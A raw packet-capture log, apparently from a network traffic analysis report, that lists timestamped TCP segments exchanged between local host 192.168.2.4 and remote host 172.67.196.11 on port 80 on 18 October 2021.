                                                                    Oct 18, 2021 08:02:35.394973040 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.394989014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395003080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395011902 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395018101 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395032883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395051003 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395174980 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395445108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395473957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395488977 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395500898 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395500898 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395513058 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395524979 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395539999 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395550966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395555973 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395566940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395585060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395601034 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395610094 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395616055 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395638943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395661116 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395802975 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395828962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395843029 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395849943 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395863056 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395879984 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395891905 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395895004 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395910978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395911932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395926952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395941973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395956993 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395966053 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.395972013 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395991087 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.395994902 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396008968 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396015882 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396020889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396038055 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396059036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396060944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396084070 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396095037 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396106958 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396122932 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396133900 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396137953 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396152973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396167040 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396172047 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396188974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396189928 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396203041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396218061 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396233082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396246910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396249056 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396261930 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396271944 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396276951 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396295071 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396311045 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396311998 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396321058 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396325111 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396342039 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396354914 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396357059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396372080 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396378040 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396387100 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396420956 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396702051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396758080 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396761894 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396779060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396794081 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396809101 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396823883 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396826982 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396838903 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396846056 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396857977 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396874905 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396881104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396888971 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396904945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396919012 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.396925926 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.396945953 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.400944948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.400969028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.400990963 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.400996923 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401027918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401046991 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401046991 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401072025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401093006 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401093960 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401108980 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401124954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401139975 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401148081 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401155949 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401174068 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401175976 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401194096 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401195049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401221037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401242018 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401252985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401273966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401298046 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401315928 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401330948 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401339054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401348114 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401348114 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401364088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401366949 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401379108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401392937 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401407957 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401417017 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401426077 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401449919 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401456118 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401458025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401468039 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401472092 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401484966 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401500940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401515961 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401532888 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401539087 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401554108 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401570082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401586056 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401587009 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401601076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401609898 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401619911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401626110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401635885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401654005 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401657104 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401669025 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401684046 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401690960 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401700974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401715994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401731014 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401741982 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401750088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401767015 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401770115 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401778936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401788950 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401833057 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.401917934 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401938915 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401954889 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401969910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.401977062 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402012110 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402021885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402061939 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402209044 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402251959 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402266979 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402282000 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402297974 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402309895 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402312994 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402324915 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402326107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402338028 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402349949 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402364969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402379990 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402391911 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402403116 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402415037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402434111 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402434111 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402442932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402457952 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402481079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402496099 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402498960 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402519941 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402528048 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402540922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402563095 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402582884 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402590990 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402605057 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402611017 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402627945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402631044 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402647972 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402669907 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402690887 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402694941 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402712107 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402734041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402741909 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402755022 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402765036 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.402779102 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.402811050 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403547049 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403567076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403584003 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403605938 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403637886 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403676033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403696060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403713942 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403728962 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403744936 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403760910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403767109 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403778076 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403799057 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403814077 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.403835058 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.403879881 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.405499935 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.405519009 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.405596018 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.465251923 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481487036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481537104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481574059 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481606007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481611967 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481650114 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481662989 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481698990 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481744051 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481750011 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481781960 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481821060 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481832027 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481859922 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481897116 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481916904 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.481936932 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481975079 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.481981993 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482023954 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482068062 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482083082 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482109070 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482146978 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482184887 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482198000 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482220888 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482223988 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482259989 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482296944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482317924 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482345104 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482389927 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482426882 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482428074 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482467890 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482494116 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482506037 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482543945 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482553959 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482582092 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482620001 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482656002 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482666969 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482709885 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482748985 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482758999 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482788086 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482810020 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482825041 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482861996 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482898951 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482898951 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482937098 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.482948065 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.482985973 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483027935 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483031034 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483066082 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483104944 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483130932 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483170986 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483206987 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483230114 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483254910 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483298063 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483306885 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483351946 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483403921 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483414888 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483457088 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483503103 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483524084 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483557940 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483606100 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483608007 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483664036 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483717918 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483762026 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483767033 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483814955 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483818054 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483867884 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483916998 CEST8049816172.67.196.11192.168.2.4
                                                                    Oct 18, 2021 08:02:35.483948946 CEST4981680192.168.2.4172.67.196.11
                                                                    Oct 18, 2021 08:02:35.483972073 CEST8049816172.67.196.11192.168.2.4
